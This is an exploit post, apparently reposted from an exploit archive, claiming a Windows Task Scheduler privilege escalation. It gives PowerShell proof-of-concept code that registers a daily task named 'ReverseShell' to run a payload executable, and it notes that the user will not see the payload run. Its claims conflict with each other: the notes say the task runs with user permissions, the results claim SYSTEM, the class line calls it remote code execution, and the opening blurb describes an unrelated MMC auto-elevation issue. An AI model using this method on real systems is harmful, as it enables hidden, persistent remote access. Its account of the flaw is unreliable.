Microsoft Windows Task Scheduler suffers from a local privilege escalation vulnerability. The Windows MMC auto-elevates members of the ‘administrators’ group via the GUI and MMC snap-ins (via mmc.exe) automatically elevate without prompting UAC potentially leading to unintentional elevation of privilege.
# Exploit Title: Microsoft Windows Task Scheduler Privilege Escalation
# Date: 10/7/19
# Exploit Author: Social Engineering Neo
# Version: Windows 7 SP1 → Windows 10 1903
# Tested on: 7 SP1, 10 1809 & 1903
# Microsoft Windows Task Scheduler EoP Report by Social Engineering Neo.
#
# Normal Users are able to Tirgger Programs at Intervals on any Account on the Host System/Domain without Propper Authorization.
# Read our in depth report @ https://github.com/SocialEngineeringNeo/Exploits/blob/master/Our%20Exploits/Microsoft/taskschdEoP_Report.txt
#Platform:
#
# Windows 7 SP1, Windows 10 (1809 & 1903), All versions in between are likely to be affected.
# Tested on the most recent security patch. (July 2019)
#Class:
#
# Improper Authorization (CWE-285).
# Remote Code Execution.
#Proof of Concept: -
#Windows ≤7
Import-Module PSScheduledJob
$trigger = New-JobTrigger -Daily -At 9pm
Register-ScheduledJob -Name "ReverseShell" -FilePath 'C:\Users\seneo\Documents\payload-x64.exe' -Description "This Task Will Run the Reverse Shell." -Trigger $trigger
#Windows ≥8
Import-Module ScheduledTasks
$action = New-ScheduledTaskAction -Execute 'C:\Users\seneo\Documents\payload-x64.exe'
$trigger = New-ScheduledTaskTrigger -Daily -At 9pm
Register-ScheduledTask -Action $action -Trigger $trigger -TaskName "ReverseShell" -Description "This Task Will Run the Reverse Shell."
#CLI NOTE: - We have not put much time/effort into the script-based PoC, we encourage a skilled programmer to elaborate on this further;)
# : - PoC will run task with "user" permissions.
# : - You obviously need your own payload and configure accordingly.
#VIDEO: - https://youtu.be/z2C-IykCfbk **updated**
# : - https://youtu.be/_leFNyo5wxM *original*
#Expected Result: -
#
# Normal users should not be able to run tasks as other user and execute programs on accounts without proper authorization.
#Observed Result: -
#
# Task runs with 'SYSTEM' privileges on all users upon trigger with no authentication, leading to total system compromisation.
#NOTE: - We reported this issue to Microsoft.
# : - According to Microsoft, this functionality is considered "By Design" & have no intent to service this issue.
# : - Have a read @ https://www.microsoft.com/en-us/msrc/windows-security-servicing-criteria
# : - We (Social Engineering Neo) consider this as a PoC rather than an actual exploit.
# : - Because the payload was being loaded through Task Scheduler, the user will have no knowlege the payload is being ran. (even if they checked)
#TIMELINE: - Discovery 5th July 2019
# : - Initial Report 5th July 2019
# : - Case Opened 8th July 2019
# : - Added Detail 8th July 2019 *Public Disclosure Date: - 30th July 2019 (25 days from initial discovery)
# : - MSRC Response 9th July 2019
# : - Our Response 9th July 2019
# : - Case Closed 9th July 2019
# : - MSRC Response 9th July 2019
# : - Our Response 9th July 2019 *Public Disclosure Date: - 10th July 2019 (24 hours from closed case)
#
# : - We thank the MSRC team for their quick response.
# 0day.today [2019-12-04] #